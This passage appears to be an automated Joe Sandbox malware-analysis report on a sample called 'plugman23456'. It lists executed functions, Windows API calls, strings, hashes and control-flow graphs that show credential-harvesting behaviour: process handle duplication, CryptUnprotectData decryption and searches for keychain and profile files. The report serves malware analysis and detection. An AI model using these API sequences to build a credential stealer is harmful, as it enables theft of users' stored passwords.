42a115 147 API calls 40136->40147 40137 415a91 memset 40137->40147 40138 43a642 40138->40146 40175 4169a7 11 API calls 40138->40175 40142 43a635 40174 42c02e memset 40142->40174 40146->40128 40147->40133 40147->40136 40147->40137 40147->40146 40157 42ff8c 40147->40157 40165 4165ff 11 API calls 40147->40165 40166 439504 13 API calls 40147->40166 40167 4312d0 147 API calls 40147->40167 40168 42be4c memcpy memcpy memcpy memset memcpy 40147->40168 40169 43a121 11 API calls 40147->40169 40149 4169a7 11 API calls 40150 43a325 40149->40150 40150->40138 40150->40142 40150->40146 40150->40149 40151 42b5b5 memset memcpy 40150->40151 40152 42bf4c 14 API calls 40150->40152 40171 42b63e 14 API calls 40150->40171 40172 4165ff 11 API calls 40150->40172 40173 42bfcf memcpy 40150->40173 40151->40150 40152->40150 40156->40128 40176 43817e 40157->40176 40159 42ff99 40160 42ffe3 40159->40160 40161 42ffd0 40159->40161 40164 42ff9d 40159->40164 40181 4169a7 11 API calls 40160->40181 40180 4169a7 11 API calls 40161->40180 40164->40147 40165->40147 40166->40147 40167->40147 40168->40147 40169->40147 40170->40150 40171->40150 40172->40150 40173->40150 40174->40138 40175->40146 40177 438187 40176->40177 40179 438192 40176->40179 40182 4380f6 40177->40182 40179->40159 40180->40164 40181->40164 40184 43811f 40182->40184 40183 438164 40183->40179 40184->40183 40187 437e5e 40184->40187 40210 4300e8 memset memset memcpy 40184->40210 40211 437d3c 40187->40211 40189 437eb3 40189->40184 40190 437ea9 40190->40189 40195 437f22 40190->40195 40226 41f432 40190->40226 40193 437f06 40237 415c56 11 API calls 40193->40237 40197 432d4e 3 API calls 40195->40197 40200 437f7f 40195->40200 40196 437f95 40238 415c56 11 API calls 40196->40238 40197->40200 40198 43802b 40239 4165ff 11 API calls 40198->40239 40200->40196 40200->40198 40202 438054 40240 437371 138 API calls 40202->40240 40205 43806b 40206 438094 40205->40206 40241 42f50e 138 API calls 40205->40241 40208 437fa3 40206->40208 40242 4300e8 memset memset memcpy 40206->40242 40208->40189 40243 41f638 104 API calls 40208->40243 40210->40184 40212 437d69 40211->40212 40215 437d80 40211->40215 40244 437ccb 11 API calls 40212->40244 40214 437d76 40214->40190 40215->40214 40216 437da3 40215->40216 40218 437d90 40215->40218 40219 438460 134 API calls 40216->40219 40218->40214 40248 437ccb 11 API calls 40218->40248 40222 437dcb 40219->40222 40220 437de8 40247 424f26 123 API calls 40220->40247 40222->40220 40245 444283 13 API calls 40222->40245 40224 437dfc 40246 437ccb 11 API calls 40224->40246 40232 41f44f 40226->40232 40236 41f54d 40226->40236 40227 41f466 40227->40193 40227->40195 40232->40227 40234 41f50b 40232->40234 40249 41f1a5 40232->40249 40274 41c06f memcmp 40232->40274 40275 41f3b1 90 API calls 40232->40275 40276 41f398 86 API calls 40232->40276 40234->40227 40234->40236 40277 41c295 86 API calls 40234->40277 40236->40227 40278 41c635 memset memset 40236->40278 40237->40189 40238->40208 40239->40202 40240->40205 40241->40206 40242->40208 40243->40189 40244->40214 40245->40224 40246->40220 40247->40214 40248->40214 40250 41bc3b 101 API calls 40249->40250 40251 41f1b4 40250->40251 40252 41edad 86 API calls 40251->40252 40259 41f282 40251->40259 40253 41f1cb 40252->40253 40254 41f1f5 memcmp 40253->40254 40255 41f20e 40253->40255 40253->40259 40254->40255 40256 41f21b memcmp 40255->40256 40255->40259 40257 41f326 40256->40257 40260 41f23d 40256->40260 40258 41ee6b 86 API calls 40257->40258 40257->40259 40258->40259 40259->40232 40260->40257 40261 41f28e memcmp 40260->40261 40263 41c8df 56 API calls 40260->40263 40261->40257 40262 41f2a9 40261->40262 40262->40257 40265 41f308 40262->40265 40266 41f2d8 40262->40266 40264 41f269 40263->40264 40264->40257 40267 41f287 40264->40267 40268 41f27a 40264->40268 40265->40257 40272 4446ce 11 API calls 40265->40272 40269 41ee6b 86 API calls 40266->40269 40267->40261 40270 41ee6b 86 API calls 40268->40270 40271 41f2e0 40269->40271 40270->40259 40273 41b1ca memset 40271->40273 40272->40257 40273->40259 40274->40232 40275->40232 40276->40232 40277->40236 40278->40227 40279 41493c EnumResourceNamesW 40280 44660a 40283 4465e4 40280->40283 40282 446613 40284 4465f3 __dllonexit 40283->40284 40285 4465ed _onexit 40283->40285 40284->40282 40285->40284

                          Executed Functions

                          Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                          APIs
                          • memset.MSVCRT ref: 0040DDAD
                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                          • CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                          • _wcsicmp.MSVCRT ref: 0040DEB2
                          • _wcsicmp.MSVCRT ref: 0040DEC5
                          • _wcsicmp.MSVCRT ref: 0040DED8
                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                          • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                          • memset.MSVCRT ref: 0040DF5F
                          • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                          • _wcsicmp.MSVCRT ref: 0040DFB2
                          • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                          • API String ID: 708747863-3398334509
                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                          Function 00413D4C Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                          • memset.MSVCRT ref: 00413D7F
                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                          • memset.MSVCRT ref: 00413E07
                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                          • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                          • CloseHandle.KERNELBASE(?), ref: 00413EA8
                          • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                          • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Handle$??3@CloseProcessProcess32memset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                          • API String ID: 3405910027-1740548384
                          • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                          • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                          Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                          • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                          • memcpy.MSVCRT ref: 0040B60D
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                          • String ID: BIN
                          • API String ID: 1668488027-1015027815
                          • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                          • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                          Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                            • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                          • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                          • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                          • String ID:
                          • API String ID: 2947809556-0
                          • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                          • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                          Function 00404423 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                          Download Yara Rule
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                          • String ID:
                          • API String ID: 767404330-0
                          • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                          • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                          Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FileFind$FirstNext
                          • String ID:
                          • API String ID: 1690352074-0
                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                          Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0041898C
                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: InfoSystemmemset
                          • String ID:
                          • API String ID: 3558857096-0
                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                          Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 44 44558e-445594 call 444b06 4->44 45 44557e-445580 call 4136c0 4->45 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 37 445823-445826 14->37 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 49 445879-44587c 18->49 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 82 445685 21->82 83 4456b2-4456b5 call 40b1ab 21->83 31 445605-445607 22->31 32 445603 22->32 29 4459f2-4459fa 23->29 30 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->30 132 44592d-445945 call 40b6ef 24->132 133 44594a 24->133 39 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 29->39 40 445b29-445b32 29->40 151 4459d0-4459e8 call 40b6ef 30->151 152 4459ed 30->152 31->21 43 445609-44560d 31->43 32->31 50 44584c-445854 call 40b1ab 37->50 51 445828 37->51 181 445b08-445b15 call 40ae51 39->181 52 445c7c-445c85 40->52 53 445b38-445b96 memset * 3 40->53 43->21 47 44560f-445641 call 4087b3 call 40a889 call 4454bf 43->47 44->3 63 445585-44558c call 41366b 45->63 148 445665-445670 call 40b1ab 47->148 149 445643-445663 call 40a9b5 call 4087b3 47->149 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 50->13 66 44582e-445847 call 40a9b5 call 4087b3 51->66 59 445d1c-445d25 52->59 60 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 52->60 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 53->67 68 445b98-445ba0 53->68 87 445fae-445fb2 59->87 88 445d2b-445d3b 59->88 167 445cf5 60->167 168 445cfc-445d03 60->168 63->44 64->19 80 445884-44589d call 40a9b5 call 4087b3 65->80 135 445849 66->135 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 154 44589f 80->154 81->52 97 44568b-4456a4 call 40a9b5 call 4087b3 82->97 114 4456ba-4456c4 83->114 102 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->102 103 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->103 156 4456a9-4456b0 97->156 161 445d67-445d6c 102->161 162 445d71-445d83 call 445093 102->162 196 445e17 103->196 197 445e1e-445e25 103->197 128 4457f9 114->128 129 4456ca-4456d3 call 413cfa call 413d4c 114->129 128->6 172 4456d8-4456f7 call 40b2cc call 413fa6 129->172 132->133 133->23 135->50 148->114 149->148 151->152 152->29 154->64 156->83 156->97 174 445fa1-445fa9 call 40b6ef 161->174 162->87 167->168 179 445d05-445d13 168->179 180 445d17 168->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->59 200 445b17-445b27 call 40aebe 181->200 201 445aa3-445ab0 call 40add4 181->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->40 201->181 218 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->218 242 445e62-445e69 202->242 243 445e5b 202->243 223 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->223 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->181 223->87 255 445f9b 223->255 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->52 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->223 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                          APIs
                          • memset.MSVCRT ref: 004455C2
                          • wcsrchr.MSVCRT ref: 004455DA
                          • memset.MSVCRT ref: 0044570D
                          • memset.MSVCRT ref: 00445725
                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                            • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                            • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                          • memset.MSVCRT ref: 0044573D
                          • memset.MSVCRT ref: 00445755
                          • memset.MSVCRT ref: 004458CB
                          • memset.MSVCRT ref: 004458E3
                          • memset.MSVCRT ref: 0044596E
                          • memset.MSVCRT ref: 00445A10
                          • memset.MSVCRT ref: 00445A28
                          • memset.MSVCRT ref: 00445AC6
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                          • memset.MSVCRT ref: 00445B52
                          • memset.MSVCRT ref: 00445B6A
                          • memset.MSVCRT ref: 00445C9B
                          • memset.MSVCRT ref: 00445CB3
                          • _wcsicmp.MSVCRT ref: 00445D56
                          • memset.MSVCRT ref: 00445B82
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                          • memset.MSVCRT ref: 00445986
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                          • API String ID: 1274392031-3798722523
                          • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                          • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                          Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                          • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                          • String ID: $/deleteregkey$/savelangfile
                          • API String ID: 2744995895-28296030
                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                          Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 0040B71C
                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                          • wcsrchr.MSVCRT ref: 0040B738
                          • memset.MSVCRT ref: 0040B756
                          • memset.MSVCRT ref: 0040B7F5
                          • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
